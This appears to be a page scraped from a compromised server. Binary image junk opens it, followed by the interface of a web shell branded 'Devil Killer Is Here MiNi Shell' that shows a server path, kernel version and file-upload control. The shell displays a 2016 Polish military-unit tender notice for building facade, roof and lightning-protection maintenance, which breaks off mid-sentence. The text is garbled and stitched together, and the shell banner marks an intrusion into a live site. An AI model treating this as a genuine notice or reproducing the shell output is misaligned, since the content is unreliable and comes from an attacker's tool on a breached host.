JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160426/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160426/46311-N-2016.html

<p class="kh_header"><b>Rzeszów: Konserwacja elewacji, dachu, obróbek blacharskich, instalacji odgromowej - budynki nr 2 oraz 22 przy ul. Langiewicza 4 w Rzeszowie (ZP/21/2016)</b><br>
<b>Numer ogłoszenia: 46311 - 2016; data zamieszczenia: 26.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 34 Wojskowy Oddział Gospodarczy w Rzeszowie , ul. Krakowska 11B, 35-111 Rzeszów, woj. podkarpackie, tel. 261 15 56 59, faks 261 15 63 85.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.34wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja elewacji, dachu, obróbek blacharskich, instalacji odgromowej - budynki nr 2 oraz 22 przy ul. Langiewicza 4 w Rzeszowie (ZP/21/2016).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia stanowi konserwacja elewacji, dachu, obróbek blacharskich, instalacji odgromowej - budynki nr 2 oraz 22 przy ul. Langiewicza 4 w Rzeszowie.
2. Przedmiot zamówienia obejmuje wykonanie następującego zakresu robót:
1) Roboty z branży ogólnobudowlanej:
Budynek nr 2:
- naprawa, uzupełnienie i wykonanie czapek kominowych,
- naprawa, uzupełnienie i wykonanie tynków kominów ponad dachem,
- malowanie kominów i czapek kominowych farbą akrylową,
- wymiana rynien dachowych na rynny z blachy ocynkowanej,
- wymiana dwóch rur spustowych na rury z blachy stalowej powlekanej oraz malowanie pozostałych rur spustowych,
- oczyszczenie powierzchni pokrycia dachowego z rdzy, kurzu, zanieczyszczeń biologicznych i nie biologicznych, przez szczotkowanie mechaniczne do II stopnia czystości,
- oczyszczenie i odtłuszczenie powierzchni pokrycia dachowego przez mycie gorącą wodą pod ciśnieniem środkiem myjącym i odtłuszczającym,
- dokonanie przeglądu pokrycia dachowego z wykonaniem wszystkich niezbędnych napraw pokrycia i pozostałych elementów przed przystąpieniem do finalnego nakładania zabezpieczenia antykorozyjnego,
- naniesienie preparatu antykorozyjnego i zabezpieczającego pokrycie dachu natryskiem bezpowietrznym z wzmocnieniem siatką wzmacniającą w miejscach przecieków oraz obróbek kominów, przejść instalacyjnych przez pokrycie dachu, podstaw dachowych, masztu itp. z aplikacją preparatu pędzlem,
- oczyszczenie, odgrzybienie, zabezpieczenie środkiem przeciwgrzybicznym i ogniochronnym desek okapu, krokwi oraz odeskowania podokapowego, bejcowanie elementów drewnianych i malowanie lakierem bezbarwnym,
- oczyszczenie, uzupełnienie, przygotowanie, zagruntowanie powierzchni ozdobnego gzymsu z dwukrotnym malowaniem farbą akrylową,
- zbicie zawilgoconych, uszkodzonych, odparzonych i słabych tynków oraz zbicie tynków w miejscach zgrubień, nierówności i sfalowań tynku,
- zmycie powierzchni tynku elewacji oraz ścian (po odbiciach tynku) myjką na gorącą wodę z środkiem usuwającym zabrudzenia i odtłuszczającym oraz usuwającym wykwity,
- odgrzybienie ścian w miejscach zawilgoceń,
- uzupełnienie podkładu pod tynk elewacyjny w miejscach odbić oraz w miejscach wykonanej instalacji odgromowej,
- uzupełnienie tynku zewnętrznego, nakrapianego, w miejscach uzupełnień podkładu pod tynk, tynk nakrapiany barwiony w masie w kolorystyce i odcieniu finalnego koloru malowania elewacji,
- dwukrotne malowanie elewacji farbą akrylową w dwóch kolorach z wykonaniem gruntowania wraz z odtworzeniem napisu przy głównych drzwiach wejściowych do budynku do schrony OPL wraz z strzałką wskazującą kierunek,
- dwukrotne malowanie krat okiennych i siatek oraz barierki w oknie klatki schodowej farbą ftalową z oczyszczeniem i miniowaniem,
- demontaż kraty okiennej na elewacji bocznej od strony kompleksu wojskowego z montażem otwieranej, osiatkowanej kraty okiennej,
- montaż kraty okiennej, otwieranej i osiatkowanej na elewacji tylnej, okno o powierzchni powyżej 3 m2 z łukowymi narożami górnymi,
- nowe, montowane kraty okienne muszą spełniać wymagania techniczne określone w opisie przedmiotu zamówienia oraz specyfikacji technicznej wykonania robót,
- montaż oraz przestawianie kompletu rusztowań, wykonanie wszystkich niezbędnych daszków ochronnych: nad wejściem do budynku oraz ewentualnie ciągłych wzdłuż rusztowania, wykonanie instalacji odgromowej, stosowanie siatek ochronnych,
- wymiana kratki wentylacyjnej na elewacji frontowej,
- wymiana nawiewów do pomieszczeń wc na elewacji tylnej,
- malowanie drobnych elementów metalowych oraz rury z blachy w szachcie elewacji frontowej,
- wymiana parapetów okiennych na elewacji frontowej z blachy stalowej powlekanej o wymiarach i z zabezpieczeniami boków jak istniejące,
- odbicie tynku szacht okien podpiwniczenia z wyrównaniem powierzchni ścian, wykonaniem nowych tynków oraz ich malowaniem farbą akrylową,
- rozbiórka i ponowne wykonanie betonowych daszków ścian szacht z ich malowaniem farbą akrylową,
- rozbiórka i ponowne wykonanie posadzki betonowej szacht wraz z podłożem,
- wymiana kratek odpływowych w szachtach z oczyszczeniem przykanalików i ewentualną ich wymianą (odcinkowo),
- demontaż istniejących barierek z rur szacht elewacji frontowej z montażem barierek z rur chromoniklowych,
- oczyszczenie i dwukrotne malowanie farbą ftalową z miniowaniem barierek z rur szacht elewacji tylnej,
- staranna rozbiórka obłożenia cokołu z masy lastryko, z zachowaniem szczególnej ostrożności, z odsłonięciem cokołu kamiennego z piaskowca, należy prowadzić roboty tak aby nie uszkodzić powierzchni cokołu kamiennego z piaskowca,
- hydrościerne oczyszczenie cokołu z piaskowca, ewentualne uzupełnienie powierzchni oraz dwukrotna hydrofobizacja powierzchni,
- wykonanie uzupełnienia, wzdłuż elewacji frontowej, z czerwonej kostki betonowej typu Holland, w miejsce rozebranego obłożenia z masy lastryko,
- rozbiórka istniejącej, betonowej, płyty odbojowej i wykonanie płytki odbojowej z kostki betonowej szarej na podsypce cementowo-piaskowej w obramowaniu z czerwonego obrzeża betonowego z korytowaniem, profilowaniem i zagęszczaniem podłoża, wykonaniem warstw konstrukcyjnych z ich zagęszczeniem,
- wbudowanie gruntu z korytowania oraz części podłoży gruntowych (nie zanieczyszczonych gruzem i odpadami) z rozbieranej opaski z wyrównaniem, nawożeniem i obsianiem trawą
Budynek nr 22:
- oczyszczenie powierzchni obróbek blacharskich, rynien i rur spustowych, parapetów i innych elementów metalowych z rdzy, kurzu, zanieczyszczeń biologicznych i nie biologicznych, przez szczotkowanie mechaniczne lub czyszczenie ręczne z odtłuszczeniem przez mycie gorącą wodą pod ciśnieniem środkiem myjącym i odtłuszczającym,
- dokonanie przeglądu w/w elementów z ewentualnym dokonaniem drobnych uzupełnień,
- dwukrotne malowanie elementów metalowych jw. farbą ftalową z miniowaniem,
- odbicie tynku zawilgoconego, miejsc zgrubień, nierówności i sfalowań tynku, odparzeń tynku,
- zmycie powierzchni tynku elewacji oraz ścian (po odbiciach tynku) myjką na gorącą wodę z środkiem usuwającym zabrudzenia i odtłuszczającym oraz usuwającym wykwity,
- uzupełnienie podkładu pod tynk elewacyjny w miejscach odbić oraz uzupełnienie tynku zewnętrznego, nakrapianego, w miejscach uzupełnień podkładu pod tynk, tynk nakrapiany barwiony w masie w kolorystyce i odcieniu finalnego koloru malowania elewacji,
- dwukrotne malowanie elewacji farbą akrylową w kilku kolorach z wykonaniem gruntowania, przetarciem i przygotowaniem istniejących tynków,
- wykonanie odprowadzenia wody opadowej z rury spustowej w przyległy teren,
2) Roboty z branży elektrycznej (konserwacja instalacji odgromowej - budynek nr 2)
a) Roboty ziemne:
- rozebranie nawierzchni z kostki betonowej przed ścianą   frontową  budynku (pas kostki o szerokości 1m i długości ok. 40m ),
- ręczne kopanie rowów  kablowych o głębokości ok. 1,2 m i szerokości ok. 0,4m,     o łącznej długości  ok. 160m. Dotyczy to wykopu  pod uziom poziomy FeZn 50 x 4mm,  stabilizowany dziesięcioma typowymi uziomami pionowymi pogrążanymi  mechanicznie - uziomy skręcane prętowe FeZn o = 22mm,l = 2m  o łącznej  długości h = 4m, z uchwytem w górnej części uziomu umożliwiającym połączenie przez spawanie z płaskownikiem FeZn 50 x 4  z którego  wykonany jest otok budynku i przewody uziemiające.
W trakcie kopania rowów należy usuwać stare elementy uziomów. 
Uwaga! W trakcie wykonywania wykopów należy zachować szczególną ostrożność ze względu na liczne kable teletechniczne praktycznie z trzech stron budynku  i elektroenergetyczne znajdujące się od frontu budynku,  patrz rys.nr3 . Wystąpią również kolizje z infrastrukturą podziemną budynku (kanalizacja deszczowa, kanalizacja sanitarna, studzienki teletechniczne itp.)
- układanie uziomu poziomego (otoku) o rezystancji stabilizowanej uziomami pionowymi,
- układanie przewodów uziemiających, wyprowadzanych na wysokość 1,2m na ścianę budynku, 
- połączenie przez spawanie uziomu poziomego, przewodów uziemiających i uziomów pionowych - patrz rys. nr 3.  Spawy należy  zabezpieczyć antykorozyjnie. 
- Wykonać dokumentację fotograficzną spawów.
- w trakcie układania uziomu poziomego (otoku ) i przewodów uziemiających należy zachować wymagane odległości od kabli teletechnicznych i elektroenergetycznych, w przypadku przewodów kanalizacji uziom przepychać pod rurami, studzienki należy omijać zachowując ciągłość otoku. W związku z powyższym odległość otoku od ścian budynku będzie się zmieniać w granicach 1,5 do 3,5m. Minimalna głębokość wykopu pod uziom poziomy 1,2m, wynika z konieczności zachowania odległości od wspomnianych już kabli teletechnicznych i elektroenergetycznych.
Po ułożeniu całości podziemnej części instalacji odgromowej  przed zasypaniem należy wykonać pełna dokumentację fotograficzną i szkic liniowy.
- zasypanie wykopów ziemią z ukopów po usunięciu  z niej gruzy, większych kamieni itp., ubijanie warstwami co 15cm,
- montaż przewodów uziemiających w rurach osłonowych grubościennych odgromowych sztywnych np. typ GROM, odcinki rur o długości 1,5m, w tym  0,3 m rury zagłębione w gruncie, pozostałe 1,2 m rury mocowane do ściany budynku z pomocą trzech  uchwytów stalowych do rur, przykręcanych za pomocą stalowych kotw rozporowych 12mm/200mm,
- na wysokości 1,2 m  montaż natynkowy puszki osłonowej PCV złącza kontrolnego
- płaskownik/drut,
Po montażu na elewacji budynku  wszystkich  dziesięciu przewodów uziemiających w rurach osłonowych i złączy kontrolnych, należy w obecności inspektora nadzoru wykonać pomiar kontrolny rezystancji wykonanego uziemienia dla wszystkich złącz kontrolnych. Należy sporządzić protokół z pomiaru i dołączyć do dokumentacji powykonawczej łącznie z dokumentacja fotograficzną i szkicem liniowym.
Złącza kontrolne należy trwale oznakować numerami.
b) Część napowietrzna  instalacji odgromowej budynku:
- Montaż zwodów poziomych nienaprężanych instalacji odgromowej z drutu odgromowego FeZn 8mm na dachu stromym :
- kalenica i krawędzie skośne dachu  montaż na uchwytach gąsiorowych do gąsiorów blaszanych, odstęp co 0,5m,
- na pozostałych płaszczyznach dachu wg rysunku nr 1 montaż na uchwytach do blach łączonych na felc, odstęp co 0,5m,
- montaż zacisków rynnowych, odstęp co 0,5m, wg rysunku nr 1,
- montaż złącz krzyżowych drut/drut , połącznie przewodów odgromowych i odprowadzających wg rysunku nr 1,
- montaż nienaprężanych przewodów odprowadzających z wykonaniem łuku kompensacyjnego, materiał drut FeZn 8mm na uchwytach przelotowych montowanych co 0,5m do muru  na kotwach stalowych rozprężnych, średnica kotwy 12mm, długość min.200mm,
- montaż uchwytów blokujących ruchy przewodu odprowadzającego, po 3 sztuki przed złączem kontrolnym, mocowane do muru kotwami stalowymi rozprężnymi , średnica kotwy 12mm, długość min.200mm,
- montaż zwodów pionowych instalacji odgromowej z pręta  o o =16mm, iglice odgromowe o16mm, długość 2000mm AlMgSi wyposażone w złącza krzyżowe do połączenia ze zwodami poziomymi na dachu. Ilość 8 szt.. Iglice montowane  do kominów  na wspornikach dystansowych  (dystans  min. 200mm)  za pomocą typowych uchwytów opaskowych do kominów.
- Wykonanie instalacji ekwipotencjalnej łączącej  wszystkie elementy przewodzące ładunki elektryczne na elewacji budynku . Instalacja wykonana w wersji podtynkowej.
- wykonanie bruzd 50 x 100mm na wszystkich ścianach budynku - przykładowy sposób rozprowadzenia - rysunek  nr 2,
- ułożenie w bruzdach  drutu FeZn 8mm w rurach osłonowych odgromowych np., typ GROM 20/14, łączenie z elementami przewodzącymi  za pomocą złącz odgromowych, rodzaj złącza odgromowego należy  dobrać do elementu łączonego (pręt, płaskownik, blacha itp.). Bruzdy zostaną zatynkowane w trakcie robót budowlanych.
- W trakcie wykonywania połączeń miejscowych należy dopilnować połączenia wszystkich elementów łączonych np. parapet metalowy z kratą zewnętrzną. Połączenia  ekwipotencjalne połączone z przewodami odprowadzającymi jak na rysunku nr 2.
3) Roboty wspólne dla wszystkich rodzajów robót:
- zalecana i zdaniem inwestora, niezbędna wizja lokalna na przyszłym placu budowy przed sporządzeniem kosztorysu ofertowego,
- zabezpieczenie przed zabrudzeniem (podczas prowadzenia robót) okien, drzwi wejściowych, elementów elewacji, urządzeń zamontowanych na elewacji i dachu folią, zabezpieczenie elementów zagospodarowania terenu, drzew, krzewów, kwietników itp. wraz z niezwłocznym ich oczyszczeniem w przypadku zabrudzenia,
- złom (elementy stalowe, metalowe i z metali kolorowych) pozyskany z rozbiórek i demontaży, Wykonawca własnym transportem na własny koszt przeważy w obecności przedstawiciela zamawiającego i przewiezie do magazynu SOI Rzeszów mieszczące się przy ul. Konopnickiej w Rzeszowie oraz złoży we wskazanym miejscu oraz podpisze protokół przekazania,
- Wykonawca własnym transportem i na własny koszt wywiezienie z placu budowy oraz zutylizuje pozostałe materiały z rozbiórek, demontaży i odpady budowlane,
- Wykonawca własnym transportem i na własny koszt wywiezienie z placu budowy oraz zutylizuje odpady farb i innych środków używanych do robót malarskich i antykorozyjnych, przygotowania powierzchni, mycia powierzchni elewacji, obróbek blacharskich, połaci dachowych, innych elementów metalowych, robót odgrzybieniowych i impregnacyjnych,
- wywóz i utylizację odpadów jw. oraz rozliczenie złomu Wykonawca będzie dokonywał na bieżąco,
- Użytkownik może wymagać natychmiastowego usunięcia odpadów i złomu z placu budowy oraz sprzątania otoczenia budynku w przypadkach wystąpienia takiej konieczności,
- zabezpieczenie środowiska przed wpływem w/w środków a w przypadku dopuszczenia do skażenia środowiska podjęcie akcji ratunkowej i zabezpieczającej,
- porządkowanie, sprzątanie, mycie po robotach remontowych i renowacyjnych  z usuwaniem uszkodzeń,
- po zakończeniu robót remontowych i renowacyjnych uporządkowanie terenu wokół budynków oraz użytkowanych przez Wykonawcę dróg dojazdowych i dojść, likwidacja magazynków podręcznych, ewentualnego zaplecza budowy i placów składowych, usunięcie powstałych szkód,
- splantowanie zniszczonych fragmentów trawników, wyrównanie powierzchni, przygotowanie terenu pod obsianie trawą, wysianie trawy z nawożeniem,
- przygotowanie kompletu materiałów odbiorowych oraz pisemne zgłoszenie zakończenia robót i gotowości do odbioru,
PO ZAKOŃCZONYCH ROBOTACH BUDOWLANYCH I ELEKTRYCZNYCH TEREN BUDOWY NALEŻY DOPROWADZIĆ DO STANU POWSZECHNIE UWAŻANEGO ZA ESTETYCZNY, CZYSTY I UMOŻLIWIAJĄCY PROWADZENIE PRACY.
Uwagi
- uzyskany z rozbiórek gruz i odpady jak również odpady powstałe przy przygotowaniu powierzchni do robót konserwacyjnych Wykonawca wywiezie i zutylizuje we własnym zakresie i na własny koszt,
- złom pozyskany z rozbiórek i demontaży Wykonawca własnym transportem na własny koszt przeważy w obecności przedstawiciela Zamawiającego i przewiezie do magazynu SOI Rzeszów oraz złoży we wskazanym miejscu.
3. Szczegółowy opis przedmiotu zamówienia dla wyżej wskazanego zakresu robót przedstawiony został w Przedmiarach Robót (Załącznik nr 9), Opisie Przedmiotu Zamówienia (Załącznik 10A i 10B) i Specyfikacji Technicznej Wykonania Robót Budowlanych (Załącznik nr 11A i 11B) oraz na Rysunkach Technicznych (Załącznik nr 12).
4. Odpowiedzialność Wykonawcy z tytułu rękojmi za wady fizyczne każdego z elementów przedmiotu umowy, w tym na wbudowane urządzenia i materiały wynosi 5 lat (60 miesięcy), licząc od dnia odbioru końcowego całego przedmiotu umowy. Realizacja uprawnień wynikających z rękojmi będzie wykonywana zgodnie z przepisami Kodeksu Cywilnego.
5. Wykonawca udzieli gwarancji na wady fizyczne każdego z elementów przedmiotu umowy licząc od dnia odbioru końcowego całego przedmiotu umowy na zasadach określonych w § 13 Projektu umowy (Załącznik nr 8). Okres obowiązywania gwarancji Wykonawca określi w złożonej ofercie, przy czym okres ten nie może być krótszy niż 60 miesięcy i podlegać będzie ocenie na podstawie kryterium oceny ofert: gwarancja - 10%
Oferta Wykonawcy, który nie określi w złożonej ofercie terminu gwarancji lub zaproponowany termin gwarancji będzie krótszy aniżeli 60 miesięcy - zostanie odrzucona.
6. Projekt umowy stanowi również uzupełnienie opisu przedmiotu zamówienia w zakresie postanowień nie uregulowanych zapisami niniejszego Rozdziału.
7. Jeżeli w jakimkolwiek miejscu w dokumentacji projektowej, Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych, zostały wskazane nazwy producenta, nazwy własne, znaki towarowe, patenty lub pochodzenie materiałów czy urządzeń służących do wykonania niniejszego zamówienia - wszędzie tam Zamawiający dodaje wyrazy lub równoważne.
8. Zamiast materiałów i urządzeń wskazanych w specyfikacji istotnych warunków zamówienia oraz załącznikach do niej, dla których są wskazane nazwy producenta, nazwy własne, znaki towarowe, patenty lub pochodzenie można stosować materiały i urządzenia równoważne pod względem parametrów technicznych, jakościowych, funkcjonalnych oraz użytkowych. Przewidziane do zastosowania urządzenia i materiały powinny spełniać parametry tam określone i nie powinny być gorsze od przyjętych założeń.
9. Stosownie do art. 30 ust. 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych wykonawca powołujący się na zastosowanie materiałów równoważnych winien wykazać, iż spełniają one wymogi zamawiającego w szczególności poprzez udokumentowanie załączonymi do oferty informacjami na temat parametrów techniczno-wytrzymałościowych, szczegółowych rysunków technicznych, atestów, aprobat, deklaracji zgodności, kartami katalogowymi urządzeń i materiałów zamiennych. Niniejsze dokumenty muszą w sposób jednoznaczny stwierdzać równoważność proponowanych materiałów i urządzeń w stosunku do przyjętych w  projekcie.
10. Zamawiający nie przewiduje zawarcia umowy ramowej. 
11. Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem udziału w postępowaniu jest wniesienie wadium na okres związania ofertą na kwotę/wartość: 4.000,00 zł (słownie: cztery tysiące złotych 00/100).
2. Wadium wnosi się przed upływem terminu składania ofert.
3. Wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. nr 42, poz. 275).
4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: Wadium wnoszone w pieniądzu należy wpłacić na rachunek: bankowy Zamawiającego prowadzony: Narodowy Bank Polski Oddział Okręgowy Rzeszów nr  98 1010 1528 0018 9213 9120 0000 - z adnotacją wadium w przetargu nr ZP/21/2016, NIP [Wykonawcy]).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek w powyższym zakresie zostanie uznany za spełniony, jeżeli Wykonawca ubiegający się o udzielenie zamówienia wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał w sposób należyty, zgodnie ze sztuką budowlaną oraz prawidłowo ukończył: co najmniej 2 roboty odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia o wartości nie mniejszej niż  100 tys. zł brutto (słownie sto tysięcy złotych brutto) każda. 
UWAGA I: Za robotę budowlaną odpowiadającą swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia należy rozumieć robotę budowlaną zrealizowaną w ramach jednej umowy, która swym zakresem obejmuje roboty remontowe ogólnobudowlane zw. z remontem/konserwacją/wykonaniem elewacji i pokryć dachowych oraz elektryczne do których Zamawiający zaliczy również remont/konserwacje/ wykonanie instalacji odgromowej na łączną wartość co najmniej 100 tys. zł brutto.
UWAGA II: Nie dopuszcza się sumowania wartości robót budowlanych zrealizowanych w ramach kilku umów w celu uzyskania progu wartościowego wyznaczonego przez Zamawiającego</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek w powyższym zakresie zostanie uznany za spełniony, jeżeli Wykonawca ubiegający się o udzielenie zamówienia wykaże, że dysponuje lub będzie dysponował co najmniej: 
